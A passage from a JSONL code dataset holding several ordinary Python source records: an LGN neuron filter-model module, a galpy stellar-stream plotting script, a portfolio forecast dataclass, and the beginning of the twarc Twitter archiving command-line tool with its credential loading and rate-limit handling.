kwargs.items():\n# if isinstance(val, (list, np.ndarray)):\n# sew_param_dict[key]=val\n# else:\n# static_param_dict[key]=val\n# \n# cell_list = []\n# loop_keys, loop_lists = zip(*sew_param_dict.items())\n# for param_tuple in itertools.product(*loop_lists): \n# param_dict = dict(zip(loop_keys, param_tuple))\n# print param_dict\n# param_dict.update(static_param_dict)\n# cell_list += cell_creation_function(**param_dict)\n# \n# return cell_list\n\ndef multi_cell_random_generator(cell_creation_function=None, **kwargs):\n \n sew_param_dict = {}\n static_param_dict = {}\n range_key_dict = {}\n for key, val in kwargs.items():\n if isinstance(val, (sps.rv_continuous, sps.rv_discrete)) or type(val) == type(sps.multivariate_normal()):\n sew_param_dict[key]=val\n elif isinstance(val, np.ndarray): \n range_key_dict[key] = val\n else:\n static_param_dict[key]=val\n \n number_of_cells = static_param_dict.pop('number_of_cells', 1)\n \n for key, val in range_key_dict.items():\n assert len(val) == number_of_cells\n \n cell_list = []\n loop_keys, loop_lists = zip(*sew_param_dict.items())\n value_instance_list = zip(*map(lambda x: x.rvs(size=number_of_cells), loop_lists))\n for ii, curr_value_instance in enumerate(value_instance_list):\n param_dict = dict(zip(loop_keys, curr_value_instance))\n param_dict.update(static_param_dict)\n param_dict['number_of_cells'] = 1\n for range_key in range_key_dict:\n param_dict[range_key] = range_key_dict[range_key][ii]\n \n if cell_creation_function is None:\n cell_list.append(param_dict)\n else:\n cell_list += cell_creation_function(**param_dict)\n \n return cell_list\n \n \ndef make_single_unit_cell_list(number_of_cells=None,\n lattice_unit_center=None,\n weights=None,\n kpeaks=None,\n delays=None,\n amplitude=None,\n sigma=None,\n width=5,\n transfer_function_str = 'Heaviside(s)*s'):\n\n cell_list = []\n for _ in range(number_of_cells):\n dxi = np.random.uniform(-width*1./2,width*1./2)\n dyi = np.random.uniform(-width*1./2,width*1./2)\n temporal_filter = TemporalFilterCosineBump(weights, kpeaks,delays)\n spatial_filter = GaussianSpatialFilter(translate=(dxi,dyi), sigma=sigma, origin=lattice_unit_center) # all distances measured from BOTTOM LEFT\n spatiotemporal_filter = SpatioTemporalFilter(spatial_filter, temporal_filter, amplitude=amplitude)\n transfer_function = ScalarTransferFunction(transfer_function_str)\n if amplitude > 0.:\n cell = OnUnit(spatiotemporal_filter, transfer_function)\n elif amplitude < 0.:\n cell = OffUnit(spatiotemporal_filter, transfer_function) \n else:\n raise Exception\n \n \n cell_list.append(cell)\n \n return cell_list\n\ndef make_on_off_cell_list(number_of_cells=None,\n lattice_unit_center=None,\n weights_on=None,\n weights_off=None,\n kpeaks_on=None,\n kpeaks_off=None,\n delays_on = None,\n delays_off = None,\n amplitude_on=None,\n amplitude_off=None,\n sigma_on=None,\n sigma_off=None,\n subfield_separation=None,\n ang=None,\n dominant_subunit=None,\n width=5,\n transfer_function_str = 'Heaviside(x)*x + Heaviside(y)*y'):\n\n cell_list = []\n for _ in range(number_of_cells):\n \n dxi = np.random.uniform(-width*1./2,width*1./2)\n dyi = np.random.uniform(-width*1./2,width*1./2)\n \n dominant_subfield_location = (lattice_unit_center[0]+dxi, lattice_unit_center[1]+dyi)\n# hor_offset = np.cos(ang*np.pi/180.)*subfield_separation\n# vert_offset = np.sin(ang*np.pi/180.)*subfield_separation\n# nondominant_subfield_translation = (hor_offset,vert_offset)\n \n if dominant_subunit == 'on': \n on_translate = dominant_subfield_location#(0,0)\n off_translate = dominant_subfield_location#nondominant_subfield_translation\n \n elif dominant_subunit == 'off':\n \n off_translate = dominant_subfield_location#(0,0)\n on_translate = dominant_subfield_location#nondominant_subfield_translation\n \n else:\n raise Exception\n \n on_origin = off_origin = (0,0)#dominant_subfield_location\n\n temporal_filter_on = TemporalFilterCosineBump(weights_on, kpeaks_on,delays_on)\n spatial_filter_on = GaussianSpatialFilter(translate=on_translate,sigma=sigma_on, origin=on_origin) # all distances measured from BOTTOM LEFT\n on_filter = SpatioTemporalFilter(spatial_filter_on, temporal_filter_on, amplitude=amplitude_on)\n \n temporal_filter_off = TemporalFilterCosineBump(weights_off, kpeaks_off,delays_off)\n spatial_filter_off = GaussianSpatialFilter(translate=off_translate,sigma=sigma_off, origin=off_origin) # all distances measured from BOTTOM LEFT\n off_filter = SpatioTemporalFilter(spatial_filter_off, temporal_filter_off, amplitude=amplitude_off)\n\n# cell = LGNOnOffCell(on_filter, off_filter, transfer_function=MultiTransferFunction((symbolic_x, symbolic_y), transfer_function_str))\n cell = TwoSubfieldLinearCell(on_filter,off_filter,subfield_separation=subfield_separation, onoff_axis_angle=ang, dominant_subfield_location=dominant_subfield_location)\n cell_list.append(cell)\n \n return cell_list\n\n# amplitude_list = amplitude_dist.rvs(size=5)\n# kpeak_list = kpeak_dist.rvs(size=5)\n# cell_config = {'number_of_cells':5,\n# 'lattice_unit_center':(40,30),\n# 'weights':(.4,-.2),\n# 'kpeaks':kpeak_list,\n# 'amplitude':amplitude_list,\n# 'sigma':(4,4),\n# 'width':5}\n# multi_cell_tensor_generator(make_single_unit_cell_list, **cell_config)\n\n\n# amplitude_dist = sps.rv_discrete(values=([20,25], [.5,.5]))\n# kpeak_dist = sps.multivariate_normal(mean=[40., 80.], cov=[[5.0, 0], [0, 5]])\n# \n# single_unit_cell_config = {'number_of_cells':10,\n# 'lattice_unit_center':(40,30),\n# 'weights':(.4,-.2),\n# 'kpeaks':kpeak_dist,\n# 'amplitude':amplitude_dist,\n# 'sigma':(4,4),\n# 'width':5}\n# \n# \n# amplitude_on_dist = sps.rv_discrete(values=([20,25], [.5,.5]))\n# amplitude_off_dist = sps.rv_discrete(values=([-10,-15], [.5,.5]))\n# kpeak_on_dist = sps.multivariate_normal(mean=[40., 80.], cov=[[5.0, 0], [0, 5]])\n# kpeak_off_dist = sps.multivariate_normal(mean=[100., 160.], cov=[[5.0, 0], [0, 5]])\n# #ang_dist = sps.rv_discrete(values=(np.arange(0,360,45), 1./8*np.ones((1,8))))\n# ang_dist = np.arange(0,360,45)\n# \n# two_unit_cell_config={'number_of_cells':8,\n# 'lattice_unit_center':(40,30),\n# 'weights_on':(.4,-.2),\n# 'weights_off':(.4,-.1),\n# 'kpeaks_on':kpeak_on_dist,\n# 'kpeaks_off':kpeak_off_dist,\n# 'amplitude_on':20.,\n# 'amplitude_off':-10.,\n# 'sigma_on':(4,4),\n# 'sigma_off':(4,4),\n# 'subfield_separation':2.,\n# 'ang':ang_dist,\n# 'dominant_subunit':'on',\n# 'width':5}\n\n \ndef evaluate_cell_and_plot(input_cell, input_movie, ax, show=False):\n t, y = input_cell.evaluate(input_movie,downsample = 10)\n ax.plot(t, y)\n \n if show == True:\n plt.show()\n \n \n# if __name__ == \"__main__\":\n# \n# # Create stimulus 0:\n# frame_rate = 60\n# m1 = FullFieldFlashMovie(np.arange(60), np.arange(80), 1., 3., frame_rate=frame_rate).full(t_max=3)\n# m2 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2, frame_rate=frame_rate, max_intensity=-1).full(t_max=2)\n# m3 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2., frame_rate=frame_rate).full(t_max=2)\n# m4 = FullFieldFlashMovie(np.arange(60), np.arange(80), 0, 2, frame_rate=frame_rate, max_intensity=0).full(t_max=2)\n# m0 = m1+m2+m3+m4\n# \n# # Create stimulus 1:\n# movie_file = '/data/mat/RamIyer/for_Anton/grating_ori0_res2.mat'\n# m_file = sio.loadmat(movie_file)\n# m_data_raw = m_file['mov_fine'].T\n# m_data = np.reshape(m_data_raw,(3000,64,128))\n# m1 = Movie(m_data, frame_rate=1000.)\n# \n# #Create stimulus 2:\n# movie_file = '/data/mat/iSee_temp_shared/TouchOfEvil_norm.npy'\n# m_data = np.load(movie_file, 'r')\n# m = Movie(m_data[1000:], frame_rate=30.)\n# \n# movie_list = [m0, m1, m2]\n# \n# #====================================================\n# \n# #Create cell list\n# \n# cell_list = []\n# \n# #On cells\n# params_tON = (5, (40,30), (.4,-.2),(40,80),20.,(4,4))\n# tON_list = make_single_unit_cell_list(*params_tON)\n# cell_list.append(tON_list)\n# \n# params_sON = (5, (40,30), (.4,-.1),(100,160),20.,(4,4))\n# sON_list = make_single_unit_cell_list(*params_sON)\n# cell_list.append(sON_list)\n# \n# #Off cells\n# params_tOFF = (5, (40,30), (.4,-.2),(40,80),-20.,(4,4))\n# tOFF_list = make_single_unit_cell_list(*params_tOFF)\n# cell_list.append(tOFF_list)\n# \n# params_sOFF = (5, (40,30), (.4,-.1),(100,160),-20.,(4,4))\n# sOFF_list = make_single_unit_cell_list(*params_sOFF)\n# cell_list.append(sOFF_list)\n# \n# #ONOFF cells\n# params_onoff = (5, (40,30),(.4, -.2),(.4,-.2),(40, 80),(50,100),20.,-20.,(4,4),(4,4),2.,0,'on')\n# onoff_list = make_on_off_cell_list(*params_onoff)\n# cell_list.append(onoff_list)\n# \n# #Two subunit cells\n# params_twosub = (5, (40,30),(.4, -.2),(.4,-.1),(40, 80),(100,160),20.,-10.,(4,2),(3,4),10.,90,'on')\n# twosub_list = make_on_off_cell_list(*params_twosub)\n# cell_list.append(twosub_list)\n# \n# #=====================================================\n# #Evaluate and plot responses\n# nc = len(movie_list)\n# nr = len(cell_list)\n# fig, axes = plt.subplots(nr,nc+2) \n# \n# for curr_row, curr_cell in zip(axes, cell_list):\n# curr_cell.show_spatial_filter(np.arange(60),np.arange(80), ax=curr_row[0], show=False, colorbar=False)\n# curr_cell.show_temporal_filter(ax=curr_row[1], show=False)\n# \n# for curr_row, curr_cell in zip(axes, cell_list):\n# for curr_ax, curr_movie in zip(curr_row[2:], movie_list):\n# evaluate_cell_and_plot(curr_cell, curr_movie, curr_ax, show=False)\n# \n# plt.tight_layout() \n# plt.show()\n","sub_path":"bmtk/simulator/filternet/lgnmodel/make_cell_list.py","file_name":"make_cell_list.py","file_ext":"py","file_size_in_byte":12310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"456873284","text":"import sys\nimport numpy\nfrom galpy.util import bovy_plot, bovy_conversion\nfrom galpy import potential\nfrom galpy.orbit import Orbit\nfrom galpy.actionAngle_src.actionAngleIsochroneApprox\\\n import actionAngleIsochroneApprox\nfrom galpy.df_src.streamdf import streamdf\nfrom matplotlib import pyplot\n_NTRACKCHUNKS= 4\n_SIGV=0.365\ndef illustrate_track(plotfilename1,plotfilename2,plotfilename3):\n #Setup stream model\n lp= potential.LogarithmicHaloPotential(q=0.9,normalize=1.)\n aAI= actionAngleIsochroneApprox(b=0.8,pot=lp)\n obs= numpy.array([1.56148083,0.35081535,-1.15481504,\n 0.88719443,-0.47713334,0.12019596])\n sdf= streamdf(_SIGV/220.,progenitor=Orbit(obs),pot=lp,aA=aAI,\n leading=True,nTrackChunks=_NTRACKCHUNKS,\n tdisrupt=4.5/bovy_conversion.time_in_Gyr(220.,8.))\n #First calculate meanOmega and sigOmega\n mOs= numpy.array([sdf.meanOmega(t,oned=True) for t in sdf._thetasTrack])\n sOs= numpy.array([sdf.sigOmega(t) for t in sdf._thetasTrack])\n mOs-= sdf._progenitor_Omega_along_dOmega\n mOs*= -bovy_conversion.freq_in_Gyr(220.,8.)\n sOs*= bovy_conversion.freq_in_Gyr(220.,8.)\n progAngle= numpy.dot(sdf._progenitor_angle,sdf._dsigomeanProgDirection)\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs,'ko',ms=8.,\n xlabel=r'$\\theta_\\parallel$',\n ylabel=r'$\\Omega_\\parallel\\,(\\mathrm{Gyr}^{-1})$',\n xrange=[-0.2-1.14,1.6-1.14],\n yrange=[22.05,22.55])\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs,'k-',lw=1.5,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,\n mOs[0]*numpy.ones(len(sdf._thetasTrack))+0.03,\n 'ko',ls='--',dashes=(20,10),lw=1.5,overplot=True,\n ms=6.)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs+2*sOs,'ko',ms=6.,mfc='none',\n zorder=1,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs-2*sOs,'ko',ms=6.,mfc='none',\n zorder=1,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs+2*sOs,'k-.',lw=1.5,\n zorder=0,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,mOs-2*sOs,'k-.',lw=1.5,\n zorder=0,overplot=True)\n bovy_plot.bovy_plot(sdf._thetasTrack+progAngle,sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)*numpy.ones(len(sdf._thetasTrack)),\n 'k--',lw=1.5,overplot=True)\n bovy_plot.bovy_plot((sdf._thetasTrack+progAngle)[0],(sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)*numpy.ones(len(sdf._thetasTrack)))[0],\n 'ko',ms=6.,overplot=True)\n bovy_plot.bovy_text(1.05+progAngle,22.475,r'$\\mathrm{progenitor\\ orbit}$',size=16.)\n bovy_plot.bovy_text(progAngle+0.05,22.50,r'$\\mathrm{current\\ progenitor\\ position}$',size=16.)\n bovy_plot.bovy_plot([progAngle+0.05,progAngle],[22.50,sdf._progenitor_Omega_along_dOmega*bovy_conversion.freq_in_Gyr(220.,8.)],'k:',overplot=True)\n bovy_plot.bovy_text(-1.2,22.35,r\"$\\mathrm{At\\ the\\ progenitor's}\\ \\theta_{\\parallel}, \\mathrm{we\\ calculate\\ an\\ auxiliary\\ orbit\\ through}$\"+'\\n'+r\"$(\\mathbf{x}_a,\\mathbf{v}_a) = (\\mathbf{\\Omega}_p+\\Delta \\mathbf{\\Omega}^m,\\boldsymbol{\\theta}_p)\\ \\mathrm{using\\ a\\ linearized}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})\\ \\mathrm{to}\\ (\\mathbf{x},\\mathbf{v}).$\",size=16.)\n yarcs= numpy.linspace(22.30,22.39,101)\n bovy_plot.bovy_plot(sdf._thetasTrack[0]+progAngle-0.1*numpy.sqrt(1.-(yarcs-22.35)**2./0.05**2.),yarcs,'k:',\n overplot=True)\n bovy_plot.bovy_text(-1.3,22.07,r'$\\mathrm{At\\ a\\ small\\ number\\ of\\ points, we\\ calculate}$'+'\\n'+r'$\\partial(\\mathbf{\\Omega},\\boldsymbol{\\theta})/\\partial (\\mathbf{x},\\mathbf{v}), \\mathrm{the\\ mean\\ stream\\ track\\ in}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})^\\dagger,$'+'\\n'+r'$\\mathrm{and\\ estimate\\ the\\ spread\\ around\\ the\\ track}.$',size=16.)\n bovy_plot.bovy_plot([-0.9,sdf._thetasTrack[1]+progAngle],\n [22.185,mOs[1]+0.03],\n 'k:',overplot=True)\n bovy_plot.bovy_plot([-0.9,progAngle+sdf._thetasTrack[1]],\n [22.185,mOs[1]],\n 'k:',overplot=True)\n bovy_plot.bovy_text(-0.18,22.265,r'$\\mathrm{stream\\ track\\ +\\ spread}$',\n size=16.,\n rotation=-20.)\n bovy_plot.bovy_end_print(plotfilename1)\n #Now plot Z,X\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n pyplot.figure()\n sdf.plotTrack(d1='z',d2='x',interp=True,\n color='k',spread=2,overplot=True,lw=1.5,\n scaleToPhysical=True)\n sdf.plotTrack(d1='z',d2='x',interp=False,marker='o',ms=8.,color='k',\n overplot=True,ls='none',\n scaleToPhysical=True)\n sdf.plotProgenitor(d1='z',d2='x',color='k',\n overplot=True,ls='--',lw=1.5,dashes=(20,10),\n scaleToPhysical=True)\n pyplot.plot(sdf._progenitor.z(sdf._trackts)*8.,\n sdf._progenitor.x(sdf._trackts)*8.,marker='o',ms=6.,\n ls='none',\n color='k')\n pyplot.xlim(8.,-3.)\n pyplot.ylim(12.,15.5)\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$Z\\,(\\mathrm{kpc})$',r'$X\\,(\\mathrm{kpc})$')\n bovy_plot.bovy_text(0.,14.25,r'$\\mathrm{auxiliary\\ orbit}$',\n size=16.,rotation=-20.)\n bovy_plot.bovy_text(1.,13.78,r'$\\mathrm{stream\\ track\\ +\\ spread}$',\n size=16.,rotation=-25.)\n bovy_plot.bovy_text(7.5,14.2,r\"$\\mathrm{At\\ these\\ points, we\\ calculate\\ the\\ stream\\ position\\ in}\\ (\\mathbf{x},\\mathbf{v})\\ \\mathrm{from}$\"+\n '\\n'+r\"$\\mathrm{the\\ auxiliary's}\\ (\\mathbf{x}_a,\\mathbf{v}_a) = (\\mathbf{\\Omega}_a,\\boldsymbol{\\theta}_a), \\mathrm{the\\ mean\\ offset} (\\Delta \\mathbf{\\Omega},\\Delta \\boldsymbol{\\theta}),$\"+'\\n'+\n r\"$\\mathrm{and}\\ \\left(\\frac{\\partial(\\mathbf{\\Omega},\\boldsymbol{\\theta})}{\\partial (\\mathbf{x},\\mathbf{v})}\\right)^{-1 \\, \\dagger}.$\",\n size=16.)\n bovy_plot.bovy_plot([sdf._progenitor.z(sdf._trackts[1])*8.,4.5],\n [sdf._progenitor.x(sdf._trackts[1])*8.,14.8],\n 'k:',overplot=True)\n bovy_plot.bovy_text(5.6,12.4,r\"$\\mathrm{We\\ interpolate\\ the\\ track\\ between\\ the}$\"+'\\n'+r\"$\\mathrm{calculated\\ points\\ and\\ use\\ slerp\\ to}$\"+'\\n'+r\"$\\mathrm{interpolate\\ the\\ estimated\\ 6D\\ spread.}$\",\n size=16.)\n bovy_plot.bovy_plot([3.,sdf._interpolatedObsTrackXY[500,2]*8.],\n [13.3,sdf._interpolatedObsTrackXY[500,0]*8.],\n 'k:',overplot=True)\n bovy_plot.bovy_end_print(plotfilename2)\n #Finally plot l vs. d\n bovy_plot.bovy_print(fig_width=8.25,fig_height=3.5)\n pyplot.figure()\n sdf.plotTrack(d1='ll',d2='dist',interp=True,\n color='k',spread=2,overplot=True,lw=1.5)\n sdf.plotTrack(d1='ll',d2='dist',interp=False,marker='o',ms=8.,color='k',\n overplot=True,ls='none')\n sdf.plotProgenitor(d1='ll',d2='dist',color='k',dashes=(20,10),\n overplot=True,ls='--',lw=1.5)\n pyplot.plot(sdf._progenitor.ll(sdf._trackts,\n obs=[sdf._R0,0.,sdf._Zsun],ro=sdf._Rnorm),\n sdf._progenitor.dist(sdf._trackts,\n obs=[sdf._R0,0.,sdf._Zsun],ro=sdf._Rnorm),\n marker='o',ms=6.,\n ls='none',\n color='k')\n pyplot.xlim(157.,260.)\n pyplot.ylim(7.4,15.5)\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$\\mathrm{Galactic\\ longitude\\, (deg)}$',\n r'$\\mathrm{distance\\, (kpc)}$')\n bovy_plot.bovy_text(165.,13.5,r\"$\\mathrm{Finally, the\\ interpolated\\ track\\ in}\\ (\\mathbf{x},\\mathbf{v})\\ \\mathrm{is}$\"+'\\n'+r\"$\\mathrm{converted\\ to\\ observable\\ quantities\\ (here}, l\\ \\mathrm{and}\\ D).$\",\n size=16.)\n bovy_plot.bovy_plot([230.,sdf._interpolatedObsTrackLB[850,0]],\n [13.25,sdf._interpolatedObsTrackLB[850,2]],\n 'k:',overplot=True)\n bovy_plot.bovy_text(170.,9.4,r\"$\\mathrm{The\\ estimated\\ spread\\ is\\ propagated}$\"+'\\n'+r\"$\\mathrm{at\\ the\\ points\\ directly\\ from}\\ (\\mathbf{\\Omega},\\boldsymbol{\\theta})\\ \\mathrm{to}$\"+'\\n'+r\"$(l,b,D,\\ldots)\\ \\mathrm{and\\ interpolated}$\"+'\\n'+r\"$\\mathrm{using\\ slerp}.$\",\n size=16.)\n bovy_plot.bovy_plot([195.,sdf._ObsTrackLB[1,0]],\n [9.7,sdf._ObsTrackLB[1,2]],\n 'k:',overplot=True)\n bovy_plot.bovy_end_print(plotfilename3)\n return None\n\nif __name__ == '__main__':\n illustrate_track(sys.argv[1],sys.argv[2],sys.argv[3])\n","sub_path":"py/illustrate_track.py","file_name":"illustrate_track.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641757597","text":"\"\"\"Представление прогноза.\"\"\"\nimport dataclasses\n\nimport numpy as np\nimport pandas as pd\n\nfrom poptimizer.dl.ledoit_wolf import ledoit_wolf_cor\n\n\n@dataclasses.dataclass\nclass Forecast:\n \"\"\"Прогноз доходности и ковариации.\"\"\"\n\n tickers: tuple[str, ...]\n date: pd.Timestamp\n history_days: int\n mean: pd.Series\n std: pd.Series\n cov: np.array = dataclasses.field(init=False)\n cor: float = dataclasses.field(init=False)\n shrinkage: float = dataclasses.field(init=False)\n\n def __post_init__(self):\n sigma, self.cor, self.shrinkage = ledoit_wolf_cor(self.tickers, self.date, self.history_days)\n std = self.std.values\n self.cov = std.reshape(1, -1) * sigma * std.reshape(-1, 1)\n","sub_path":"poptimizer/dl/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"607245218","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport fileinput\nimport os\nimport sys\nimport json\nimport time\nimport logging\nimport argparse\nimport datetime\nimport requests\n\nfrom requests_oauthlib import OAuth1Session\n\ntry:\n import configparser # Python 3\nexcept ImportError:\n import ConfigParser as configparser # Python 2\n\nif sys.version_info[:2] <= (2, 7):\n # Python 2\n get_input = raw_input\nelse:\n # Python 3\n get_input = input\n\n# Also in setup.py\n__version__ = '0.7.0'\n\n\ndef geo(value):\n return '-74,40,-73,41'\n\n\ndef main():\n \"\"\"\n The twarc command line.\n \"\"\"\n parser = argparse.ArgumentParser(\"twarc\")\n parser.add_argument('-v', '--version', action='version',\n version='%(prog)s {version}'.format(\n version=__version__))\n parser.add_argument(\"--search\", dest=\"search\",\n help=\"search for tweets matching a query\")\n parser.add_argument(\"--max_id\", dest=\"max_id\",\n help=\"maximum tweet id to search for\")\n parser.add_argument(\"--since_id\", dest=\"since_id\",\n help=\"smallest id to search for\")\n parser.add_argument(\"--result_type\", dest=\"result_type\",\n choices=[\"mixed\", \"recent\", \"popular\"],\n default=\"recent\", help=\"search result type\")\n parser.add_argument(\"--lang\", dest=\"lang\",\n help=\"limit to ISO 639-1 language code\"),\n parser.add_argument(\"--track\", dest=\"track\",\n help=\"stream tweets matching track filter\")\n parser.add_argument(\"--follow\", dest=\"follow\",\n help=\"stream tweets from user ids\")\n parser.add_argument(\"--locations\", dest=\"locations\",\n help=\"stream tweets from a particular location\")\n parser.add_argument(\"--sample\", action=\"store_true\",\n help=\"stream sample live tweets\")\n parser.add_argument(\"--timeline\", dest=\"timeline\",\n help=\"get user timeline for a screen name\")\n parser.add_argument(\"--timeline_user_id\", dest=\"timeline_user_id\",\n help=\"get user timeline for a user id\")\n parser.add_argument(\"--lookup_screen_names\", dest=\"lookup_screen_names\",\n nargs='+', help=\"look up users by screen name; \\\n returns user objects\")\n parser.add_argument(\"--lookup_user_ids\", dest=\"lookup_user_ids\", nargs='+',\n help=\"look up users by user id; returns user objects\")\n parser.add_argument(\"--hydrate\", dest=\"hydrate\",\n help=\"rehydrate tweets from a file of tweet ids\")\n parser.add_argument(\"--log\", dest=\"log\",\n default=\"twarc.log\", help=\"log file\")\n parser.add_argument(\"--consumer_key\",\n default=None, help=\"Twitter API consumer key\")\n parser.add_argument(\"--consumer_secret\",\n default=None, help=\"Twitter API consumer secret\")\n parser.add_argument(\"--access_token\",\n default=None, help=\"Twitter API access key\")\n parser.add_argument(\"--access_token_secret\",\n default=None, help=\"Twitter API access token secret\")\n parser.add_argument('-c', '--config',\n default=default_config_filename(),\n help=\"Config file containing Twitter keys and secrets\")\n parser.add_argument('-p', '--profile', default='main',\n help=\"Name of a profile in your configuration file\")\n parser.add_argument('-w', '--warnings', action='store_true',\n help=\"Include warning messages in output\")\n\n args = parser.parse_args()\n\n logging.basicConfig(\n filename=args.log,\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s %(message)s\"\n )\n\n consumer_key = args.consumer_key or os.environ.get('CONSUMER_KEY')\n consumer_secret = args.consumer_secret or os.environ.get('CONSUMER_SECRET')\n access_token = args.access_token or os.environ.get('ACCESS_TOKEN')\n access_token_secret = args.access_token_secret or os.environ.get('ACCESS_TOKEN_SECRET')\n\n if not (consumer_key and consumer_secret and\n access_token and access_token_secret):\n credentials = load_config(args.config, args.profile)\n if credentials:\n consumer_key = credentials['consumer_key']\n consumer_secret = credentials['consumer_secret']\n access_token = credentials['access_token']\n access_token_secret = credentials['access_token_secret']\n else:\n print(\"Please enter Twitter authentication credentials\")\n consumer_key = get_input('consumer key: ')\n consumer_secret = get_input('consumer secret: ')\n access_token = get_input('access_token: ')\n access_token_secret = get_input('access token secret: ')\n save_keys(args.profile, consumer_key, consumer_secret,\n access_token, access_token_secret)\n\n t = Twarc(consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=access_token,\n access_token_secret=access_token_secret)\n\n tweets = []\n users = []\n\n # Calls that return tweets\n if args.search:\n tweets = t.search(\n args.search,\n since_id=args.since_id,\n max_id=args.max_id,\n lang=args.lang,\n result_type=args.result_type,\n )\n elif args.track or args.follow or args.locations:\n tweets = t.filter(track=args.track, follow=args.follow,\n locations=args.locations)\n elif args.hydrate:\n f_names = [args.hydrate] if args.hydrate != '--hydrate' else None\n\n input_iterator = fileinput.FileInput(\n f_names,\n mode='rU',\n openhook=fileinput.hook_compressed,\n )\n\n tweets = t.hydrate(input_iterator)\n\n elif args.sample:\n tweets = t.sample()\n elif args.timeline:\n tweets = t.timeline(screen_name=args.timeline)\n elif args.timeline_user_id:\n tweets = t.timeline(user_id=args.timeline_user_id)\n\n # Calls that return user profile objects\n elif args.lookup_user_ids:\n users = t.user_lookup(user_ids=args.lookup_user_ids)\n elif args.lookup_screen_names:\n users = t.user_lookup(screen_names=args.lookup_screen_names)\n\n else:\n raise argparse.ArgumentTypeError(\n 'must supply one of: --search --track --follow --locations'\n ' --timeline --timeline_user_id'\n ' --lookup_screen_names --lookup_user_ids'\n ' --sample --hydrate')\n\n # iterate through the tweets and write them to stdout\n for tweet in tweets:\n # include warnings in output only if they asked for it\n if 'id_str' in tweet or args.warnings:\n print(json.dumps(tweet))\n\n # add some info to the log\n if 'id_str' in tweet:\n if 'user' in tweet:\n logging.info(\"archived https://twitter.com/%s/status/%s\",\n tweet['user']['screen_name'], tweet['id_str'])\n elif 'limit' in tweet:\n t = datetime.datetime.utcfromtimestamp(\n float(tweet['limit']['timestamp_ms']) / 1000)\n t = t.isoformat(\"T\") + \"Z\"\n logging.warn(\"%s tweets undelivered at %s\",\n tweet['limit']['track'], t)\n elif 'warning' in tweet:\n logging.warn(tweet['warning']['message'])\n else:\n logging.warn(json.dumps(tweet))\n\n # iterate through the user objects and write them to stdout\n for user in users:\n # include warnings in output only if they asked for it\n if 'id_str' in user or args.warnings:\n print(json.dumps(user))\n\n # add some info to the log\n if 'screen_name' in user:\n logging.info(\"archived user profile for @%s / id_str=%s\",\n user['screen_name'], user['id_str'])\n else:\n logging.warn(json.dumps(user))\n\n\ndef load_config(filename, profile):\n if not os.path.isfile(filename):\n return None\n config = configparser.ConfigParser()\n config.read(filename)\n data = {}\n for key in ['access_token', 'access_token_secret',\n 'consumer_key', 'consumer_secret']:\n try:\n data[key] = config.get(profile, key)\n except configparser.NoSectionError:\n sys.exit(\"no such profile %s in %s\" % (profile, filename))\n except configparser.NoOptionError:\n sys.exit(\"missing %s from profile %s in %s\" % (\n key, profile, filename))\n return data\n\n\ndef save_config(filename, profile,\n consumer_key, consumer_secret,\n access_token, access_token_secret):\n config = configparser.ConfigParser()\n config.add_section(profile)\n config.set(profile, 'consumer_key', consumer_key)\n config.set(profile, 'consumer_secret', consumer_secret)\n config.set(profile, 'access_token', access_token)\n config.set(profile, 'access_token_secret', access_token_secret)\n with open(filename, 'w') as config_file:\n config.write(config_file)\n\n\ndef default_config_filename():\n \"\"\"\n Return the default filename for storing Twitter keys.\n \"\"\"\n home = os.path.expanduser(\"~\")\n return os.path.join(home, \".twarc\")\n\n\ndef save_keys(profile, consumer_key, consumer_secret,\n access_token, access_token_secret):\n \"\"\"\n Save keys to ~/.twarc\n \"\"\"\n filename = default_config_filename()\n save_config(filename, profile,\n consumer_key, consumer_secret,\n access_token, access_token_secret)\n print(\"Keys saved to\", filename)\n\n\ndef rate_limit(f):\n \"\"\"\n A decorator to handle rate limiting from the Twitter API. If\n a rate limit error is encountered we will sleep until we can\n issue the API call again.\n \"\"\"\n def new_f(*args, **kwargs):\n errors = 0\n while True:\n resp = f(*args, **kwargs)\n if resp.status_code == 200:\n errors = 0\n return resp\n elif resp.status_code == 429:\n reset = int(resp.headers['x-rate-limit-reset'])\n now = time.time()\n seconds = reset - now + 10\n if seconds < 1:\n seconds = 10\n logging.warn(\"rate limit exceeded: sleeping %s secs\", seconds)\n time.sleep(seconds)\n elif resp.status_code >= 500:\n errors += 1\n if errors > 30:\n logging.warn(\"too many errors from Twitter, giving up\")\n resp.raise_for_status()\n seconds = 60 * errors\n logging.warn(\"%s from Twitter API, sleeping %s\",\n resp.status_code, seconds)\n time.sleep(seconds)\n else:\n resp.raise_for_status()\n return new_f\n\n\ndef catch_conn_reset(f):\n \"\"\"\n A decorator to handle connection reset errors even ones from pyOpenSSL\n until https://github.com/edsu/twarc/issues/72 is resolved\n \"\"\"\n try:\n import OpenSSL\n ConnectionError = OpenSSL.SSL.SysCallError\n except:\n ConnectionError = requests.exceptions.ConnectionError\n\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n 